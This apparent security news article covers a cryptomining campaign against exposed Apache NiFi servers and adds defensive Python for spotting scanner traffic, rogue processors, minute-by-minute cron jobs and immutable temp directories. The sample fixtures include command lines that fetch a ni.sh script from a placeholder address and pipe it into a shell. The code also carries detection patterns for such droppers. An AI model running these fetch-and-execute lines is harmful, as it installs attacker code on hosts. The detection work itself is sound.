Hackers are hunting for exposed Apache NiFi instances for cryptocurrency mining

Threat actors are actively scanning the internet for unprotected Apache NiFi instances in order to enlist them in a cryptocurrency-mining botnet, researchers at the SANS Internet Storm Center warn.

The ongoing campaign was first spotted on May 19, when the researchers noticed a sharp rise in HTTP requests for the path /nifi, the NiFi web interface. After routing some of those requests to an Apache NiFi instance running in their honeypot, the researchers found that the attackers either install a cryptocurrency miner or attempt lateral movement by harvesting SSH credentials from the server. A NiFi instance exposed without authentication is a direct path to command execution: anyone who can reach its web UI and REST API can add processors, and some standard NiFi processors exist precisely to run commands and scripts on the host.

The attack scripts are kept in memory only and never written to disk. Persistence is achieved through timer-driven NiFi processors or cron entries, SANS says.

“An attacker for such a misconfigured system can access all the data processed by NiFi and read/modify/delete the NiFi configuration,” Dr. Johannes Ullrich, dean of research at the SANS Technology Institute, said in a blog post.

The cryptominer script attempts to delete /var/log/syslog (destroying local evidence), disable the firewall and monitoring tools, find and kill competing cryptominers, install the Kinsing cryptominer, make the standard temporary directories immutable (likely to keep other attackers from exploiting the same host), and add a cron job that runs ni.sh every minute.

On a few occasions the same threat actor also tried to run a second script, spre.sh, which collects SSH keys from the infected host and uses them to connect to other systems inside the victim’s organization.

Ullrich noted that the requests came almost exclusively from the IP address 109.207.200.43. Besides scanning for NiFi, the same IP sent requests for /boaform/admin/formLogin, the login page of various consumer routers, which scanners routinely probe for default or weak passwords and known vulnerabilities.
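The probe pattern above is easy to spot at the edge. The following Python is an added example, not code from the ISC report: it parses combined-format access-log lines, groups hits on /nifi, the NiFi REST API and /boaform/admin/formLogin by source address, and raises a finding when one source hits both the NiFi and the router-login paths, when the source is on the published scanner list, or when a state-changing call to the NiFi API came back with a 2xx (on an instance without authentication, that is how a rogue processor gets created). The log lines are constructed with documentation addresses; only 109.207.200.43 comes from the report.

```python
import re
from collections import defaultdict

# Source IP named in the ISC report as the origin of almost all the probes.
PUBLISHED_SCANNER_IPS = {"109.207.200.43"}
ROUTER_LOGIN_PATH = "/boaform/admin/formLogin"

# Combined/common access-log format (Apache, nginx); only the fields we need.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3})'
)

# Constructed sample lines (documentation addresses, not real traffic).
SAMPLE_LOG = """\
203.0.113.10 - - [19/May/2023:10:01:02 +0000] "GET /nifi HTTP/1.1" 302 0 "-" "Mozilla/5.0"
203.0.113.10 - - [19/May/2023:10:01:03 +0000] "GET /nifi/ HTTP/1.1" 200 4120 "-" "Mozilla/5.0"
203.0.113.10 - - [19/May/2023:10:01:05 +0000] "POST /nifi-api/process-groups/root/processors HTTP/1.1" 201 900 "-" "python-requests/2.28"
203.0.113.10 - - [19/May/2023:10:03:00 +0000] "GET /boaform/admin/formLogin HTTP/1.1" 404 0 "-" "Mozilla/5.0"
198.51.100.7 - - [19/May/2023:10:02:00 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "curl/7.88"
198.51.100.9 - - [19/May/2023:10:04:00 +0000] "GET /nifi/ HTTP/1.1" 401 0 "-" "Mozilla/5.0"
"""


def classify_path(path: str):
    """Map a request path to the probe family it belongs to, or None."""
    p = path.split("?", 1)[0]
    if p == "/nifi" or p.startswith("/nifi/"):
        return "nifi_ui"
    if p.startswith("/nifi-api/"):
        return "nifi_api"
    if p == ROUTER_LOGIN_PATH:
        return "boaform"
    return None


def scan_access_log(text: str):
    """Return {ip: finding} for every source that touched a probe path."""
    per_ip = defaultdict(lambda: {"nifi_ui": 0, "nifi_api": 0,
                                  "boaform": 0, "api_writes_accepted": 0})
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        kind = classify_path(m["path"])
        if kind is None:
            continue
        counts = per_ip[m["ip"]]
        counts[kind] += 1
        # A 2xx on a state-changing NiFi API call means the server accepted the
        # change; without authentication that is how a rogue processor appears.
        if (kind == "nifi_api" and m["method"] in ("POST", "PUT", "DELETE")
                and m["status"].startswith("2")):
            counts["api_writes_accepted"] += 1

    findings = {}
    for ip, counts in per_ip.items():
        reasons = []
        if ip in PUBLISHED_SCANNER_IPS:
            reasons.append("source IP published as campaign scanner")
        if (counts["nifi_ui"] or counts["nifi_api"]) and counts["boaform"]:
            reasons.append("NiFi probe and router-login probe from the same source")
        if counts["api_writes_accepted"]:
            reasons.append("NiFi accepted %d state-changing API call(s); verify they were authenticated"
                           % counts["api_writes_accepted"])
        findings[ip] = {"counts": dict(counts),
                        "severity": "high" if reasons else "info",
                        "reasons": reasons}
    return findings


if __name__ == "__main__":
    for ip, f in scan_access_log(SAMPLE_LOG).items():
        print(ip, f["severity"], f["counts"], *f["reasons"], sep="  ")
```

A single GET for /nifi from an unknown address is only informational (the last sample source gets a 401 and nothing else); the "high" verdict needs the combination the report describes or an accepted write. Feed it the access log of whatever sits in front of NiFi, or NiFi's own request log, and extend PUBLISHED_SCANNER_IPS from the report's IoC list.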

SANS published indicators of compromise (IoCs) for the campaign: additional cron jobs, disrupted SSH connections, rogue processors in the NiFi configuration, IP addresses, and hashes of the scripts and the cryptominer.
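Three of those indicators can be checked on a suspect host without network access. The Python below is an added example, not SANS's code: it lists processors in NiFi's flow.xml whose class can execute commands on the host (the timer-driven persistence described above), flags crontab entries that run every minute or fetch and execute a script such as ni.sh, and reports temporary directories that lsattr shows as immutable. The flow.xml, crontab and lsattr samples are constructed; the flow.xml is trimmed to the elements inspected (a real one carries many more per processor), while the processor class names are NiFi's own.

```python
import re
import xml.etree.ElementTree as ET

# NiFi processor classes that run arbitrary commands or scripts on the host.
COMMAND_PROCESSORS = {
    "org.apache.nifi.processors.standard.ExecuteProcess",
    "org.apache.nifi.processors.standard.ExecuteStreamCommand",
    "org.apache.nifi.processors.script.ExecuteScript",
    "org.apache.nifi.processors.groovyx.ExecuteGroovyScript",
}

# Constructed, heavily trimmed flow.xml; only the elements inspected are kept.
SAMPLE_FLOW_XML = """<flowController>
  <rootGroup>
    <id>root</id><name>NiFi Flow</name>
    <processor>
      <id>1111</id><name>GetFile</name>
      <class>org.apache.nifi.processors.standard.GetFile</class>
      <schedulingPeriod>0 sec</schedulingPeriod><scheduledState>RUNNING</scheduledState>
      <property><name>Input Directory</name><value>/data/in</value></property>
    </processor>
    <processor>
      <id>2222</id><name>ExecuteProcess</name>
      <class>org.apache.nifi.processors.standard.ExecuteProcess</class>
      <schedulingPeriod>60 sec</schedulingPeriod><scheduledState>RUNNING</scheduledState>
      <property><name>Command</name><value>/bin/bash</value></property>
      <property><name>Command Arguments</name>
        <value>-c "curl -s http://203.0.113.5/ni.sh | bash"</value></property>
    </processor>
  </rootGroup>
</flowController>"""

# Constructed `crontab -l` output for root.
SAMPLE_CRONTAB = """\
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
0 3 * * * /usr/local/bin/backup.sh
* * * * * /root/ni.sh > /dev/null 2>&1
* * * * * wget -q -O - http://203.0.113.5/ni.sh | sh
"""

# Constructed `lsattr -d /tmp /var/tmp /dev/shm` output ('i' = immutable).
SAMPLE_LSATTR = """\
----i---------e------- /tmp
--------------e------- /var/tmp
---------------------- /dev/shm
"""

EVERY_MINUTE = re.compile(r"^(\*|\*/1)(\s+\*){4}\s")
SUSPICIOUS_CMD = re.compile(
    r"ni\.sh|spre\.sh|\b(curl|wget)\b.*\|\s*(ba)?sh\b|/tmp/|/dev/shm/")


def find_command_processors(flow_xml: str):
    """Return every processor whose class can execute commands on the host."""
    found = []
    for proc in ET.fromstring(flow_xml).iter("processor"):
        cls = proc.findtext("class", "")
        if cls not in COMMAND_PROCESSORS:
            continue
        props = {p.findtext("name", ""): p.findtext("value", "")
                 for p in proc.findall("property")}
        found.append({"id": proc.findtext("id", ""),
                      "name": proc.findtext("name", ""),
                      "class": cls,
                      "state": proc.findtext("scheduledState", ""),
                      "period": proc.findtext("schedulingPeriod", ""),
                      "properties": props})
    return found


def suspicious_cron_entries(crontab: str):
    """Flag lines that run every minute or fetch/execute a script from temp or remote paths."""
    hits = []
    for line in crontab.splitlines():
        s = line.strip()
        if not s or s.startswith("#"):
            continue
        reasons = []
        if EVERY_MINUTE.match(s):
            reasons.append("runs every minute")
        if SUSPICIOUS_CMD.search(s):
            reasons.append("references a dropper script or a temp/remote location")
        if reasons:
            hits.append({"entry": s, "reasons": reasons})
    return hits


def immutable_dirs(lsattr_output: str):
    """Return the paths whose lsattr flag field contains 'i' (set by chattr +i)."""
    return [parts[-1] for parts in (l.split() for l in lsattr_output.splitlines())
            if len(parts) >= 2 and "i" in parts[0]]


if __name__ == "__main__":
    for p in find_command_processors(SAMPLE_FLOW_XML):
        print("rogue processor:", p["id"], p["class"], p["state"], p["period"], p["properties"])
    for h in suspicious_cron_entries(SAMPLE_CRONTAB):
        print("cron:", h["entry"], "->", "; ".join(h["reasons"]))
    print("immutable:", immutable_dirs(SAMPLE_LSATTR))
```

On a live host, read the flow from NiFi's conf directory with gzip (flow.xml.gz; newer releases also write flow.json.gz, which needs a JSON walk instead of ElementTree) and compare the result against the processors the flow is supposed to contain, because ExecuteProcess and friends are legitimate in many deployments. An immutable /tmp is not conclusive on its own either, but together with an every-minute cron job and a missing /var/log/syslog it matches the script behaviour described above closely enough to treat the host as compromised.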
